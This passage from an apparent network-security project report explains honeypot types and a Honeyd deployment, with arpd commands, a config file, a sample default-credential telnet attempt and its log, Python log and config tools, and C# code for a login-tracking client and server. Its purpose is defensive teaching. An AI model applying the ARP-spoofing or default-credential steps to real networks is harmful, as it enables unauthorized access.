BackOfficer Friendly (BOF). BackOfficer Friendly emulates a limited number of
services. By limiting the number of services, the attacker is restricted in how much he can
interact with the honeypot. BackOfficer Friendly will be discussed in greater detail in the
next section. The honeypot allows an attacker to connect to a port and attempt to execute
a restricted number of commands, after which the attacker is disconnected.
Figure 4.1: BackOfficer Friendly detecting an unauthorized connection
Medium Interaction Honeypots
Medium interaction honeypots offer attackers more ability to interact than low interaction
honeypots, but less than those considered high interaction. They are usually more
time-consuming to install and configure as they normally involve a high level of development
and customization from an organization. As attackers have an increased ability to interact
with this type of honeypot, more caution must be used to ensure that the attacker does not
have access to other systems. An example of a medium interaction honeypot would be
the use of a jail. This functionality allows an administrator to partition an operating
system environment, creating a virtual operating system within a real operating system.
The virtual operating system can be controlled by the real operating system, but gives the
appearance and feel of a true operating system. The goal is for an attacker to attack and
gain access to the jailed environment, so that the attacker's activities can be heavily
monitored or controlled from the real or master operating system. A medium interaction
honeypot is more complicated to deploy and comes with a higher risk, increasing the
chance that something may go wrong. However, with greater risk comes greater reward:
medium interaction honeypots may be configured to allow the administrator to gather
more information about the types of attacks.
High Interaction Honeypots
High interaction honeypots are most often research honeypots. They are used, at great
risk, to gather large amounts of information about attackers. The goal of a high
interaction honeypot is to give the attacker access to a real operating system where
nothing is emulated or restricted. High interaction honeypots give users the opportunity
to capture the tools, monitor the activity, and even learn how hackers communicate with
one another. Since this type of honeypot allows the attacker to interact with a real
operating system, there is the possibility that an attacker might use the honeypot to attack
other computers. In order to ensure that this does not take place, high interaction
honeypots need to be placed within a controlled environment that restricts the ability of a
hacker to launch attacks from within. One of the difficulties in maintaining this type of
architecture is to not allow the attacker to realize that he is being monitored in a
controlled environment. Because of the amount of risk involved and the complexity in
their implementation, high interaction honeypots may be extremely difficult to configure,
install, and maintain. Nevertheless, they are the best resource for studying the hacker
community as well as for capturing worms and viruses for analysis.
4.5.3 Review of the most popular Honeypots
Low interaction:
A- BackOfficer Friendly: http://www.nfr.com/products/bof/
B- Specter: http://www.specter.com
C- Honeyd: http://www.citi.umich.edu/u/provos/honeyd/
D- Decoy Server: http://www.recourse.com
High interaction:
E- Honeynets: http://project.honeynet.org/papers/honeynet/
A- BackOfficer Friendly (BOF)
BackOfficer Friendly is a low interaction honeypot developed by NFR Security Inc that
can run on almost any Windows-based platform, including Windows 95 and Windows
98. BackOfficer Friendly was originally created to detect when anyone attempts a Back
Orifice scan against a computer. Back Orifice is a remote control trojan penetration
application from which a hacker can, for example, access files on the infected computer,
send messages, open and close the CD drive etc... Much like a computer virus, it is
distributed as an embedded program within downloadable shareware utilities and
executable greeting card programs. When the user opens the downloaded file, Back
Orifice installs itself on the user's machine and allows the attacker complete control of
the computer through the Internet connection. BOF has since evolved to detect attempted
connections to other services, such as Telnet, FTP, SMTP, POP3 and IMAP2. When BOF
receives a connection to one of these services, it will fake replies to the hopeful hacker,
wasting the attacker's time and giving us time to stop them from doing other harm.
Basically, it pretends to be, for example, a Back Orifice server: BackOfficer Friendly gives
the attacker false answers that look like they came from Back Orifice, while logging the
attacker's IP address and the operations they attempted to perform. So, BackOfficer
Friendly is a spoofing server application which notifies us whenever someone attempts to
remotely control a system.
Figure 4.2: BOF screen capture showing spoofed services
Figure 4.3: BOF warnings
B- Specter
SPECTER is a smart honeypot or deception system. It simulates a complete machine,
providing an interesting target to lure hackers away from the production machines.
SPECTER offers common Internet services such as SMTP, FTP, POP3, HTTP and
TELNET which appear perfectly normal to the attackers but in fact are traps for them to
mess around and leave traces without even knowing that they are connected to a decoy
system, which does none of the things it appears to do, but instead logs everything and
notifies the appropriate people. Furthermore, SPECTER automatically investigates the
attackers while they are still trying to break in. SPECTER provides massive amounts of
luring content and it generates luring programs that will leave hidden marks on the
attacker's computer. Automated weekly online updates of the honeypot's content and
vulnerability databases allow the honeypot to change constantly without user interaction.
Like BOF, Specter is a low interaction honeypot that offers no operating system for the
attacker to access. Yet, Specter offers far more functionality, including the ability to
monitor more services and to more realistically emulate the applications. Additionally,
the system may be configured to emulate vulnerabilities, making it more attractive to
hackers, and to even deliver bogus information to a hacker during an attack.
Specter may be configured to have five different "personalities" or characters:
• Open: The system behaves like a badly configured system in terms of security.
• Secure: The system behaves like a well-configured system in terms of security.
• Failing: The system behaves like a machine with various hardware and software
problems.
• Strange: The system behaves unpredictably and leaves the intruder wondering
what is going on.
• Aggressive: The system communicates as long as necessary to collect information
about the attacker, then reveals its true identity by the appropriate means,
depending on the kind of connection, and then ends communication. This is very
handy to scare intruders away.
These personalities encourage the attacker to continue to interact with the honeypot and
therefore increase the amount of information available to the administrator. [21]
Figure 4.4: Specter GUI
C- Honeyd
Honeyd is a small daemon that creates virtual hosts on a network. The hosts can be
configured to run arbitrary services, and their personality can be adapted so that they
appear to be running certain operating systems. Honeyd enables a single host to claim
multiple addresses.
The different TCP personalities are learned from reading an nmap fingerprint file. The
configured personality is the operating system that nmap or xprobe will return.
Personalities can be annotated to determine if they allow FIN-scans for open ports or to
select the preference in which they reassemble fragmented IP packets. Honeyd can be
used to create a virtual honeynet or for general network monitoring. It supports the
creation of a virtual network topology including dedicated routes and routers. The routes
can be attributed with latency and packet loss to make the topology seem more realistic.
[22]
D- Decoy Server
By creating a realistic mock network environment, Decoy Server serves as an attack target
in order to protect critical areas of the network. As a supplement to security solutions
such as firewalls, it employs advanced decoy technology to enable early warning and
detection to divert and confine attacks. Symantec Decoy Server sensors deliver detection
and response and provide detailed information through their system of data collection
modules. Every action is recorded for analysis, allowing administrators to understand the
threat and implement an appropriate, policy-based response. Advanced filters enable the
solution to automatically discard insignificant events, leaving only the data required to
respond effectively to any incident. Decoy Server creates a jailed environment in which
attackers have access to virtual cages as opposed to limited operating systems. The cages
are controlled environments from which the attacker is unable to escape. Decoy Server is
able to create up to four of these cages on a single system. Being a high interaction
honeypot, Decoy Server is able to capture much more information about attacks, but, as
mentioned earlier, this comes with an increased risk. The greatest risk is that, once
attacked, the system will be used to attack other systems. Another risk is in the
complexity of administering the Decoy Server. Errors made in the configuration process
or during system maintenance increase the chance that something may go wrong during
implementation. Of course, the greatest concern is that the attacker may be able to
capitalize on an error made by the administrator or compromise the system to such a
degree that they are able to attack the host operating system. [23]
Figure 4.5: A possible deployment of Decoy Server.
E- Honeynets
A honeynet is a type of honeypot which has high interaction and is designed primarily for
research. It is through this extensive interaction that we gain information on threats, both
external and internal to an organization. What makes a honeynet different from most
honeypots is that it is an entire network of systems. Instead of a single computer, a
honeynet is a network of systems designed for attackers to interact with. These victim
systems (honeypots within the honeynet) can be any type of system, service, or
information we want to provide. It is this flexibility that gives honeynets their true
power.
The common elements of a honeynet are:
A firewall computer: logs all incoming/outgoing connections and provides NAT
(network address translation) service and some denial of service protection.
An intrusion detection system (IDS) computer: the IDS is sometimes on the same box as
the firewall, but it should be on an entirely separate computer that can see all of the
network traffic. It also logs all the network traffic and looks for known exploits and
attacks.
A remote system log computer: the honeypot is slightly modified so that all commands
an intruder would use are sent to the system log, which is then set to forward them to the
remote system log box.
The honeypot itself: the honeypot can be anything from a default Red Hat 6.2 installation
to a mirror of one of our production systems.
One of the unique features of a honeynet is that, rather than emulating a single system
like BOF and Specter or multiple systems like Honeyd and Decoy Server, it is actually a
network of standard production systems. The systems are put behind some type of access
control device and monitored for activity.
Figure 4.6: Honeynet architecture
Honeynets are clearly the riskiest of the honeypot solutions. Once an attacker gains
access to a complete operating system, available in the honeynet, there are no limitations
as to what they may be able to do to the system. They may use the system to compile
code, communicate with other hackers, distribute tools, or launch attacks on other
systems. The only thing restricting the hacker's activities is the access control device on
the outside of the honeypots. Another concern is the complexity involved in configuring
and maintaining a honeynet. Rules have to be established for all incoming and outgoing
connections. System logs must capture all activity and forward it to a remote log server
for review by the administrator. Any error in these configurations could expose the
honeynet and its associated network and administrator to increased risk. [24]
4.5.4 Our selection and work
We chose to install Honeyd on our network because it has the highest interaction among
the low interaction honeypots. It has many features and is relatively simple to use. It has
Unix and Windows versions. Since it is open source, we can emulate our own services on
it. The primary purpose of Honeyd is detection, specifically to detect unauthorized
activity within an organization. It does this by monitoring all the unused IPs in a network.
Any attempted connection to an unused IP address is assumed to be unauthorized or
malicious activity. For example, if a network has a class C address, it is unlikely that
every one of those 254 IP addresses is being used. Any connection attempted to one of
those unused IP addresses is most likely a probe, a scan, or a worm hitting the network.
Honeyd can monitor all of these unused IPs at the same time. Whenever a connection is
attempted to one of them, Honeyd automatically assumes the identity of the unused IP
address and then interacts with the attacker. This approach to detection has many
advantages over traditional methods. Any time Honeyd generates an alert, it most likely
is a real attack, not a false alarm. Honeyd also not only detects known attacks, but
unknown ones as well. By default, Honeyd can detect (and log) any activity on any UDP
or TCP port, as well as some ICMP activity. With Honeyd we can also create emulated
services that interact with the attacker. These emulated services determine what the
attacker is attempting to do and what they are looking for. We do this by creating scripts
that listen on specific ports and then interact with attackers in a predetermined manner.
For example, we can create an FTP script that emulates a wu-ftpd daemon on Linux, or a
Telnet connection on a Cisco router. These emulated services are limited because they act
in a predetermined way. The script can be written in almost any language, such as
Perl, Shell, or Expect. Below is an example of a service emulating a Cisco router.
attacker $telnet 192.168.1.150
Trying 192.168.1.150...
Users (authorized or unauthorized) have no explicit or
implicit expectation of privacy. Any or all uses of this
system may be intercepted, monitored, recorded, copied,
audited, inspected, and disclosed to authorized site,
and law enforcement personnel, as well as to authorized
officials of other agencies, both domestic and foreign.
By using this system, the user consents to such
interception, monitoring, recording, copying, auditing,
inspection, and disclosure at the discretion of authorized
site.
Unauthorized or improper use of this system may result in
administrative disciplinary action and civil and criminal
penalties. By continuing to use this system you indicate
your awareness of and consent to these terms and conditions
of use. LOG OFF IMMEDIATELY if you do not agree to the
conditions stated in this warning.
User Access Verification
Username: cisco
Password:
% Access denied
The honeyd log of the attack would look like this:
Jan 3 11:23:32 marge honeyd[22885]: Connection request: (192.168.1.10:2783 - 192.168.1.150:23)
Jan 3 11:23:32 marge honeyd[22885]: Connection established:(192.168.1.10:2783 - 192.168.1.150:23) <-> /usr/bin/perl scripts/router-telnet.pl
Jan 3 11:23:42 marge honeyd[22885]: E(192.168.1.10:2783 - 192.168.1.150:23): Attempted login: cisco/cisco
Jan 3 11:23:47 marge honeyd[22885]: Connection dropped with reset: (192.168.1.10:2783 - 192.168.1.150:23)
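Lines in the format above are what the administrator actually has to read, so it is worth turning them into per-source alerts. The following is an added example (our own Python, not part of Honeyd or of the project's code) that parses a constructed log fragment in that format, groups events by source address, and flags a source that touches several decoy addresses; the report's session from 192.168.1.10 is kept as-is and the second source, 192.168.1.44, is made up.

```python
"""Summarise honeyd syslog lines per source address (constructed sample input)."""
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Constructed sample: the report's telnet session plus a made-up host that
# probes several unused addresses in the 192.168.1.0/24 decoy space.
SAMPLE_LOG = """\
Jan 3 11:23:32 marge honeyd[22885]: Connection request: (192.168.1.10:2783 - 192.168.1.150:23)
Jan 3 11:23:32 marge honeyd[22885]: Connection established:(192.168.1.10:2783 - 192.168.1.150:23) <-> /usr/bin/perl scripts/router-telnet.pl
Jan 3 11:23:42 marge honeyd[22885]: E(192.168.1.10:2783 - 192.168.1.150:23): Attempted login: cisco/cisco
Jan 3 11:23:47 marge honeyd[22885]: Connection dropped with reset: (192.168.1.10:2783 - 192.168.1.150:23)
Jan 3 11:30:01 marge honeyd[22885]: Connection request: (192.168.1.44:40112 - 192.168.1.77:21)
Jan 3 11:30:01 marge honeyd[22885]: Connection request: (192.168.1.44:40113 - 192.168.1.77:80)
Jan 3 11:30:02 marge honeyd[22885]: Connection request: (192.168.1.44:40114 - 192.168.1.78:445)
Jan 3 11:30:02 marge honeyd[22885]: Connection request: (192.168.1.44:40115 - 192.168.1.79:139)
"""

# syslog prefix: "<Mon> <day> <hh:mm:ss> <host> honeyd[<pid>]: <message>"
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) honeyd\[(?P<pid>\d+)\]: (?P<msg>.*)$"
)
# the 4-tuple honeyd prints in every message: "(src:sport - dst:dport)"
FLOW_RE = re.compile(r"\((?P<sip>[\d.]+):(?P<sport>\d+) - (?P<dip>[\d.]+):(?P<dport>\d+)\)")
LOGIN_RE = re.compile(r"Attempted login: (?P<cred>\S+)")   # emitted by the telnet script
SCRIPT_RE = re.compile(r"<-> (?P<script>.+)$")             # emulated service that was attached


@dataclass
class SourceSummary:
    requests: int = 0
    targets: set = field(default_factory=set)    # distinct (dst_ip, dst_port) pairs touched
    scripts: set = field(default_factory=set)    # emulated services the source engaged
    logins: list = field(default_factory=list)   # credentials the source tried (user/pass)


def parse_line(line):
    """Return (timestamp, src_ip, dst_ip, dst_port, message), or None for non-honeyd lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    f = FLOW_RE.search(m["msg"])
    if not f:
        return None
    return m["ts"], f["sip"], f["dip"], int(f["dport"]), m["msg"]


def summarise(log_text):
    """Group honeyd events by source IP: request count, targets, scripts and logins."""
    out = defaultdict(SourceSummary)
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        _, sip, dip, dport, msg = parsed
        s = out[sip]
        if msg.startswith("Connection request"):
            s.requests += 1
            s.targets.add((dip, dport))
        elif msg.startswith("Connection established"):
            sm = SCRIPT_RE.search(msg)
            if sm:
                s.scripts.add(sm["script"].strip())
        else:
            lm = LOGIN_RE.search(msg)          # login attempts are reported by the service script
            if lm:
                s.logins.append(lm["cred"])
    return dict(out)


def classify(summary, scan_threshold=3):
    """Label each source: 'scan' (touched >= threshold decoy ports), 'login-attempt', or 'touch'."""
    labels = {}
    for sip, s in summary.items():
        if len(s.targets) >= scan_threshold:
            labels[sip] = "scan"
        elif s.logins:
            labels[sip] = "login-attempt"
        else:
            labels[sip] = "touch"
    return labels


if __name__ == "__main__":
    summary = summarise(SAMPLE_LOG)
    for sip, label in classify(summary).items():
        s = summary[sip]
        print(f"{sip}: {label}; {s.requests} request(s) to {len(s.targets)} decoy port(s); logins={s.logins}")
```

Because every address honeyd answers is unused, each source that appears here is worth a look; the label only orders the work.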
To implement Honeyd we need to compile and use two tools: Arpd and Honeyd. Honeyd
cannot do everything alone and requires the help of Arpd. Arpd is used for ARP
spoofing; this is what actually monitors the unused IP space and directs attacks to the
Honeyd honeypot. Honeyd does not have the capability to direct attacks to itself; it only has
the capability to interact with attackers. The commands to start both are listed below. The
networks in the commands below are the networks that Arpd will monitor and Honeyd will
interact with. In this example, the honeypot monitors all unused IP space in the
192.168.1.0/24 network.
arpd 192.168.1.0/24
honeyd -p nmap.prints -f honeyd.conf 192.168.1.0/24
So, based on the commands above, the Arpd process will monitor any unused IP space on
the 192.168.1.0/24 network. If it sees any packets going to unused IPs, it will direct those
packets to the Honeyd honeypot using ARP spoofing, a layer two attack: it answers ARP
requests for the victim's IP address with the MAC address of the honeypot. For the Honeyd command,
-p nmap.prints refers to the Nmap fingerprint database. This is the actual database that
the scanning tool Nmap uses to fingerprint operating systems. We can get the latest
Nmap fingerprint database from Nmap. The second option for the Honeyd process, -f
honeyd.conf, is the honeypot configuration file. This determines how we want the
honeypot to behave.
## Honeyd configuration file ##
### Windows computers (default)
create default
set default personality "Windows NT 4.0 Server SP5-SP6"
set default default tcp action reset
add default tcp port 110 "sh scripts/pop.sh"
add default tcp port 80 "perl scripts/iis-0.95/main.pl"
add default tcp port 25 block
add default tcp port 21 "sh scripts/ftp.sh"
add default tcp port 22 proxy $ipsrc:22
add default udp port 139 drop
set default uptime 3284460
### Cisco router
create router
set router personality "Cisco 4500-M running IOS 11.3(6) IP Plus"
add router tcp port 23 "/usr/bin/perl scripts/router-telnet.pl"
set router default tcp action reset
set router uid 32767 gid 32767
set router uptime 1327650
# Bind specific templates to specific IP address
# If not bound, default to Windows template
bind 192.168.1.150 router
We start off by creating the different types of computers we want to emulate
(templates). These templates define the behavior of each emulated operating system. In
this configuration file we have created two different emulated computers: default and
router. The first thing we need to do in each template is assign the "personality"; this is
the operating system that Honeyd will emulate at the IP stack level. We give it the OS type using the
same description as in the Nmap fingerprint database. In the above example, for the
template default, we have assigned the personality "Windows NT 4.0 Server SP5-SP6"
and for the template router we have given it the personality "Cisco 4500-M running IOS
11.3(6) IP Plus". Note that the personality does not affect the behavior of the emulated
services; it only modifies the behavior of the IP stack. For the emulated services, we have
to select different scripts based on what type of OS we want to emulate. If our personality
is Windows, it makes no sense to bind an emulated Apache script to the HTTP port.
Instead, we would bind an emulated IIS script to the HTTP port.
The next step is to define the behavior of each port. We can either assign specific ports
specific behavior, or define general behavior. In the above example, in the template default
all the TCP ports are assigned the behavior reset, so they respond with a RST to any
connection attempt (for UDP, an ICMP port unreachable). Other options are open (will
respond with an ACK, or for UDP nothing) or block (will not respond for both TCP and
UDP).
Once we have created our templates, we have to decide which IP addresses are bound to
which template. Using the bind command, as we do for the router template, we can bind
the template to specific IP addresses. In this case, if anyone attempts to connect to IP
address 192.168.1.150, they will be interacting with the Honeyd honeypot using the
router template. The default template is a key template to Honeyd. The template with the
name default becomes the default for all other connections to unused IP space. So if
any connections are made to any unused IP space in the 192.168.1.0/24 network, they
will get a Windows box emulated by Honeyd, except for the IP 192.168.1.150, at which
they will get the Cisco router.
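Before deploying a honeyd.conf it is worth checking, offline, what each decoy address and port will actually do. The following added example (our own Python, not part of Honeyd) reads the create/set/add/bind subset used in the configuration above and resolves, for a given destination address, protocol and port, which template applies and which action Honeyd takes; 192.168.1.77 is an arbitrary unused address chosen for illustration.

```python
"""Resolve which template and port action the honeyd.conf above gives a packet."""
import shlex

# The report's configuration file, embedded so the example runs stand-alone.
HONEYD_CONF = """\
create default
set default personality "Windows NT 4.0 Server SP5-SP6"
set default default tcp action reset
add default tcp port 110 "sh scripts/pop.sh"
add default tcp port 80 "perl scripts/iis-0.95/main.pl"
add default tcp port 25 block
add default tcp port 21 "sh scripts/ftp.sh"
add default tcp port 22 proxy $ipsrc:22
add default udp port 139 drop
set default uptime 3284460
create router
set router personality "Cisco 4500-M running IOS 11.3(6) IP Plus"
add router tcp port 23 "/usr/bin/perl scripts/router-telnet.pl"
set router default tcp action reset
set router uid 32767 gid 32767
set router uptime 1327650
# If not bound, an address gets the template named "default"
bind 192.168.1.150 router
"""


def parse_conf(text):
    """Read the create/set/add/bind subset of honeyd.conf.

    Returns (templates, bindings): templates maps a name to its personality,
    per-protocol default action and per-(proto, port) action; bindings maps
    an IP address to a template name.  Only directives used above are handled.
    """
    templates, bindings = {}, {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # '#' starts a comment (none inside quotes here)
        if not line:
            continue
        tok = shlex.split(line)               # keeps a quoted script command as one token
        if tok[0] == "create":
            templates[tok[1]] = {"personality": None, "default_action": {}, "ports": {}}
        elif tok[0] == "set":
            t = templates[tok[1]]
            if tok[2] == "personality":
                t["personality"] = tok[3]
            elif tok[2] == "default" and tok[4] == "action":
                t["default_action"][tok[3]] = tok[5]   # set <t> default tcp action reset
            else:
                t[tok[2]] = tok[3]                     # uptime / uid: recorded, not interpreted
        elif tok[0] == "add" and tok[2] in ("tcp", "udp") and tok[3] == "port":
            templates[tok[1]]["ports"][(tok[2], int(tok[4]))] = " ".join(tok[5:])
        elif tok[0] == "bind":
            bindings[tok[1]] = tok[2]
        else:
            raise ValueError("unsupported directive: " + line)
    return templates, bindings


def resolve(templates, bindings, dst_ip, proto, port):
    """Return (template name, configured action) for a packet to dst_ip proto/port.

    A bound address uses its template; any other unused address falls back to
    the template named 'default'.  A port with no explicit rule takes the
    template's per-protocol default action (None if the file sets none).
    """
    name = bindings.get(dst_ip, "default")
    t = templates[name]
    action = t["ports"].get((proto, port), t["default_action"].get(proto))
    return name, action


def describe(action, proto):
    """Translate a configured action into the reply a prober would observe."""
    if action is None:
        return "no rule in the file (honeyd's built-in default applies)"
    if action == "reset":
        return "TCP RST" if proto == "tcp" else "ICMP port unreachable"
    if action == "open":
        return "ACK (connection accepted)" if proto == "tcp" else "no reply"
    if action in ("block", "drop"):
        return "no reply"
    if action.startswith("proxy "):
        return "proxied to " + action.split(" ", 1)[1]
    return "emulated service: " + action


if __name__ == "__main__":
    templates, bindings = parse_conf(HONEYD_CONF)
    probes = [("192.168.1.150", "tcp", 23), ("192.168.1.150", "tcp", 80),
              ("192.168.1.77", "tcp", 80), ("192.168.1.77", "tcp", 443),
              ("192.168.1.77", "udp", 139), ("192.168.1.77", "udp", 53)]
    for ip, proto, port in probes:
        name, action = resolve(templates, bindings, ip, proto, port)
        print(f"{ip} {proto}/{port}: template={name}, {describe(action, proto)}")
```

The last probe shows a gap the file leaves open: no default UDP action is set for either template, so any UDP port other than 139 is handled by Honeyd's own fallback rather than by something the administrator chose.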
During our implementation of the above mentioned procedures we faced some
difficulties. First of all, nmap was not installed on the Fedora workstations, so we had to
install it. Second, we had to get some missing libraries in order to compile Honeyd
(libevent, an asynchronous event library; libdnet, the network library; libpcap, a packet
capture library).
4.6 User Logs
In order to monitor the users logging on to the network we decided to write a program that
records and stores all the logins and logouts of all users with their respective times and
dates. This software is written in C#.NET and will help us trace an internal attack to the
user behind it by checking the application for the last logged-in user. Instead of reading
the logs from the standard Windows log file, which is susceptible to change by any novice
internal attacker, we used the “System.Security.Principal” library in order to get the
username and domain of each logged-in user. The general idea of the code is to obtain the
username, domain and clock time from the system and send them through sockets to the server,
where they are stored in a file and are ready for display.
The software consists of two applications: the server application and the client
application.
Client application:
The task of this application is to get the username and domain and send them to the
server application.
The libraries used in this application to provide us with the necessary tools were
“System.Security.Principal”, “System.Net” and “System.Net.Sockets”.
“System.Security.Principal”: This library was useful because it contains the
WindowsIdentity class, which in turn contains the GetCurrent() function for
getting the username and domain. Its use is illustrated in the code below:
WindowsIdentity user = WindowsIdentity.GetCurrent(); byte[] byData = System.Text.Encoding.ASCII.GetBytes(user.Name.ToString()+" "+user.User.ToString()+" "+DateTime.Now.ToString()); socClient.Send(byData); “System.Net”: This library allows us to specify the destination ip addresses and endpoints
and to specify the protocol type.
“System.Net.Sockets”: this library is used to create new sockets through which the data
“byData” is sent to the destination ip.
97
class SocketPkt { public System.Net.Sockets.Socket socket; public byte[] dataBuffer = new byte[1024]; }
Full Client Application Code:
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Text;
using System.Windows.Forms;
using System.Net;
using System.Net.Sockets;
using System.Security.Principal;

namespace TestClient
{
    public partial class MainForm : Form
    {
        private Socket socClient;
        private string serverIP = "192.168.1.101";
        private int serverPort = 54323;
        private IAsyncResult asynResult;
        public AsyncCallback fnCallBack = null;

        public MainForm()
        {
            InitializeComponent();
            try
            {
                // Connect to the log server and start listening for anything it sends back
                socClient = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
                IPAddress ipAdd = IPAddress.Parse(serverIP);
                IPEndPoint serverEP = new IPEndPoint(ipAdd, serverPort);
                socClient.Connect(serverEP);
                WaitForData();
            }
            catch (SocketException se)
            {
                MessageBox.Show(se.Message, "Unable to Connect to Server");
            }
            try
            {
                // Login record: the current Windows account (DOMAIN\user) and the local time
                WindowsIdentity user = WindowsIdentity.GetCurrent();
                byte[] byData = System.Text.Encoding.ASCII.GetBytes(Environment.NewLine + "*UserName: "
                    + user.Name.ToString() + " " + "Login Time: " + " " + DateTime.Now.ToString());
                socClient.Send(byData);
            }
            catch { }
        }

        public void WaitForData()
        {
            if (fnCallBack == null)
            {
                fnCallBack = new AsyncCallback(OnDataReceived);
            }
            SocketPkt socketPkt = new SocketPkt();
            socketPkt.socket = socClient;
            asynResult = socClient.BeginReceive(socketPkt.dataBuffer, 0, socketPkt.dataBuffer.Length,
                SocketFlags.None, fnCallBack, socketPkt);
        }

        public void OnDataReceived(IAsyncResult asyn)
        {
            try
            {
                SocketPkt socketPkt = (SocketPkt)asyn.AsyncState;
                int iRx = socketPkt.socket.EndReceive(asyn);
                if (iRx == 0)
                {
                    // Zero bytes means the server closed the connection; stop re-arming the receive
                    socketPkt.socket.Close();
                    return;
                }
                char[] chars = new char[iRx + 1];
                Decoder d = Encoding.UTF8.GetDecoder();
                int charLen = d.GetChars(socketPkt.dataBuffer, 0, iRx, chars, 0);
                string strData = new string(chars, 0, charLen);
                parseReceivedData(socketPkt.socket, strData);
                WaitForData();
            }
            catch (ObjectDisposedException)
            {
                System.Diagnostics.Debugger.Log(0, "1", "\nOnDataReceived: Socket has been closed\n");
            }
            catch (SocketException se)
            {
                MessageBox.Show(se.Message);
            }
        }

        // The server never sends anything back, so received data is ignored
        private void parseReceivedData(Socket socket, string data)
        {
        }

        private void btnConnect_Click(object sender, EventArgs e)
        {
            try
            {
                socClient = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
                IPAddress ipAdd = IPAddress.Parse(serverIP);
                IPEndPoint serverEP = new IPEndPoint(ipAdd, serverPort);
                socClient.Connect(serverEP);
                WaitForData();
            }
            catch (SocketException se)
            {
                MessageBox.Show(se.Message, "Unable to Connect to Server");
            }
        }

        private void btnClose_Click(object sender, EventArgs e)
        {
            socClient.Disconnect(false);
            socClient.Close();
        }

        // Manual send: user name, SID and current time
        private void btnSend_Click(object sender, EventArgs e)
        {
            WindowsIdentity user = WindowsIdentity.GetCurrent();
            byte[] byData = System.Text.Encoding.ASCII.GetBytes(user.Name.ToString() + " "
                + user.User.ToString() + " " + DateTime.Now.ToString());
            socClient.Send(byData);
        }

        // Logout record, sent only when the form is closed by a Windows shutdown
        private void MainForm_FormClosed(object sender, FormClosedEventArgs e)
        {
            try
            {
                if (e.CloseReason == CloseReason.WindowsShutDown)
                {
                    WindowsIdentity user = WindowsIdentity.GetCurrent();
                    byte[] byData = System.Text.Encoding.ASCII.GetBytes("UserName: " + user.Name.ToString()
                        + " " + "Logout Time :" + " " + DateTime.Now.ToString());
                    socClient.Send(byData);
                }
            }
            catch { }
        }
    }
}
Server Application:
The task of this application is to receive the data sent by the client application over
TCP/IP, store this data in a log file and display it at the user’s request.
The libraries used in this application to provide us with the necessary tools were
“System.Net”, “System.IO” and “System.Net.Sockets”.
“System.Net”: This library allows us to specify the destination IP addresses and endpoints
and to specify the protocol type.
“System.Net.Sockets”: This library is used to create new sockets, so that each
logged-in user is assigned a socket of their own:
class SocketPkt
{
    public System.Net.Sockets.Socket socket;
    public byte[] dataBuffer = new byte[1024];
    public bool isActive = false;
}
“System.IO”: Used to read from and write to files through streams, for example:
StreamReader sr = new StreamReader("C:\\Log.txt", Encoding.ASCII);
Server Application Output Format: (Figure 4.7)
N.B. The clear button clears the display but the Log file remains intact.
Full Server Application Code:
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Text;
using System.Windows.Forms;
using System.Net.Sockets;
using System.Net;
using System.IO;

namespace Server_akiki
{
    public partial class Server : Form
    {
        private Socket socListener = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
        private int serverPort = 54323;
        static private int maxConnections = 1000;
        private SocketPkt[] clientSocket = new SocketPkt[maxConnections];
        private AsyncCallback fnCallBack = null;
        private IAsyncResult asynResult;

        public Server()
        {
            InitializeComponent();
            FillList();
            for (int i = 0; i < maxConnections; i++)
            {
                clientSocket[i] = new SocketPkt();
            }
            Start();
        }

        // Load the records already in the log file into the display list
        private void FillList()
        {
            if (!File.Exists("C:\\Log.txt"))
            {
                return;     // first run: nothing logged yet
            }
            StreamReader sr = new StreamReader("C:\\Log.txt", Encoding.ASCII);
            while (!sr.EndOfStream)
            {
                string x = sr.ReadLine();
                if (x != "")
                    LogList.Items.Add(x);
            }
            sr.Close();
        }

        // Listen on every local address and accept clients asynchronously
        private void Start()
        {
            try
            {
                IPEndPoint ipLocal = new IPEndPoint(IPAddress.Any, serverPort);
                socListener.Bind(ipLocal);
                socListener.Listen(maxConnections);
                socListener.BeginAccept(new AsyncCallback(OnClientConnect), null);
            }
            catch (SocketException se)
            {
                Console.Write(se.Message);
            }
        }

        public void OnDataReceived(IAsyncResult asyn)
        {
            int idx = (int)asyn.AsyncState;
            try
            {
                int iRx = clientSocket[idx].socket.EndReceive(asyn);
                if (iRx == 0)
                {
                    // Zero bytes means the client closed the connection: free its slot
                    clientSocket[idx].socket.Close();
                    clientSocket[idx].isActive = false;
                    return;
                }
                char[] chars = new char[iRx + 1];
                Decoder d = Encoding.UTF8.GetDecoder();
                int charLen = d.GetChars(clientSocket[idx].dataBuffer, 0, iRx, chars, 0);
                string strData = new string(chars, 0, charLen);
                WriteDataToFile(strData);
                WaitForData(idx);
            }
            catch (ObjectDisposedException)
            {
                System.Diagnostics.Debugger.Log(0, "1", "\nOnDataReceived: Socket has been closed\n");
            }
            catch (SocketException se)
            {
                if (clientSocket[idx].socket.Connected)
                {
                    Console.Write("OnDataReceived: " + se.Message);
                }
                else
                {
                    clientSocket[idx].isActive = false;
                }
            }
        }

        // Show the record and append it to the log file
        private void WriteDataToFile(string strData)
        {
            LogList.Items.Add(strData);
            LogList.Refresh();
            try
            {
                StreamWriter swr = new StreamWriter("C:\\Log.txt", true, Encoding.ASCII);
                swr.WriteLine(strData + "\n");
                swr.Close();
            }
            catch (Exception ex)
            {
                MessageBox.Show(ex.ToString());
            }
        }

        public void WaitForData(int idx)
        {
            if (fnCallBack == null)
            {
                fnCallBack = new AsyncCallback(OnDataReceived);
            }
            asynResult = clientSocket[idx].socket.BeginReceive(clientSocket[idx].dataBuffer, 0,
                clientSocket[idx].dataBuffer.Length, SocketFlags.None, fnCallBack, idx);
        }

        public void OnClientConnect(IAsyncResult asyn)
        {
            try
            {
                Socket accepted = socListener.EndAccept(asyn);
                int idx = getFirstInactive();
                if (idx < 0)
                {
                    accepted.Close();   // all slots in use: refuse rather than index with -1
                }
                else
                {
